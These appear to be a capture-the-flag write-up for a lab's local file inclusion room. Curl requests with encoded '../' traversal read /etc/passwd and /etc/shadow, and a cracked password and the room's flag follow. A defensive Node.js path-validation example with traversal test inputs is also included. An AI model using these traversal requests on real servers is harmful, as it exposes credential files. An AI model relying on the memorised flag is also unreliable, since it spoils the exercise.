LFI Notes

nmap
22
80
http://10.10.107.83         --in source code
<script src="/js/jquery.min.js"></script>
    <script src="/js/bootstrap.min.js"></script>
    <script>
      function getNote(note, id) {
        const url = '/get-file/' + note.replace(/\//g, '%2f')
        $.getJSON(url,  function(data) {
          document.querySelector(id).innerHTML = data.info.replace(/(?:\r\n|\r|\n)/g, '<br>');
        })
      }
      // getNote('server.js', '#note-1')
      getNote('views/notes/note1.txt', '#note-1')
      getNote('views/notes/note2.txt', '#note-2')
      getNote('views/notes/note3.txt', '#note-3')
    </script>
we can see that to view a file, the page requests /get-file/ with every / in the path replaced by %2f
exploiting that for LFI
curl http://10.10.107.83/get-file/views%2fnotes%2fnote1.txt     ---[redacted] notes
curl http://10.10.107.83/get-file/..%2f..%2f..%2fetc%2fpasswd  --got LFI and users
curl http://10.10.107.83/get-file/..%2f..%2f..%2fetc%2fshadow   --also password of charlie
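
Fix side, as an added example (not code from the target app or from these notes): a path check that a /get-file/ handler could run before reading anything, so the requests above stop at the notes directory. APP_ROOT, NOTES_DIR and resolveNote are assumed names, and the install path is constructed.

```javascript
// Added example (not the target app's code): server-side check for a
// /get-file/<name> route so that "..%2f" sequences cannot leave the notes dir.
const path = require('path').posix; // target is Linux, so POSIX path rules

// Assumptions: constructed install path; the real layout is not on the page.
const APP_ROOT = '/srv/app';
const NOTES_DIR = path.join(APP_ROOT, 'views', 'notes');

// rawName is the still-encoded URL segment, e.g. "views%2fnotes%2fnote1.txt".
function resolveNote(rawName) {
  let name;
  try {
    name = decodeURIComponent(rawName); // decode exactly once
  } catch (err) {
    return { ok: false, reason: 'bad-encoding' };
  }
  if (name.includes('\0')) return { ok: false, reason: 'nul-byte' };

  // Collapse "." and ".." first, then compare against the allowed directory.
  const candidate = path.resolve(APP_ROOT, name);
  const rel = path.relative(NOTES_DIR, candidate);
  const escapes = rel === '..' || rel.startsWith('../') || path.isAbsolute(rel);
  if (rel === '' || escapes) return { ok: false, reason: 'outside-notes-dir' };

  // Only serve the file type the page actually needs.
  if (path.extname(candidate) !== '.txt') return { ok: false, reason: 'extension' };

  // Caveat: this check is lexical. Before reading, also compare
  // fs.realpathSync(candidate) against NOTES_DIR to cover symlinks.
  return { ok: true, path: candidate };
}

// Constructed sample inputs, modelled on the requests in these notes.
const samples = [
  'views%2fnotes%2fnote1.txt',
  '..%2f..%2f..%2fetc%2fpasswd',
  '%2fetc%2fshadow',
  'server.js',
  'views%2fnotes%2f..%2f..%2fserver.js',
  '%zz',
];
for (const s of samples) console.log(s, '->', JSON.stringify(resolveNote(s)));
```

In Express, route parameters arrive already decoded, so drop the decodeURIComponent step there to avoid decoding twice.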

crack password with john     charlie:[redacted]

[redacted sensitive answer]

Hawaii -via note3

2. Read /etc/shadow and crack Charlie's password.

[redacted]

[redacted sensitive answer]

THM{4ea2adf842713ad3ce0c1f05ef12256d}

=============================================